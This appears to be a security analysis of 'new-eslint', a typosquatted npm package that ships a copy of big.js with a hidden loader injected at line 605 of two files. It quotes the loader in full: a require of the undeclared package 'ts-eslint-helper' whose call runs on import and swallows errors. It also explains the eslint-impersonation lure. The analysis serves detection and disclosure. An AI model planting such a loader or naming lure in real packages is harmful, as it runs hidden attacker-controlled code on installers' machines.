Package is published as 'new-eslint' but ships a verbatim copy of MikeMcl/big.js, with a hidden loader injected mid-file between P.minus and P.mod in both big.js:605 and big.mjs:605: const helper = require("ts-eslint-helper"); helper.from_str().then(e => e).catch(e => { });. This require fires whenever a consumer imports or requires the package and silently swallows all errors. The required package ts-eslint-helper is not declared in package.json — the manifest lists a different package, eslint-helper@4.0.1 — so the loaded code is undeclared and attacker-mutable. The README claims 'no dependencies' and describes big.js, while the package name impersonates eslint tooling: classic typosquat lure plus hidden remote-controlled loader. Whatever ts-eslint-helper.from_str() does runs in the installer's process on import with no advertised functionality justifying it.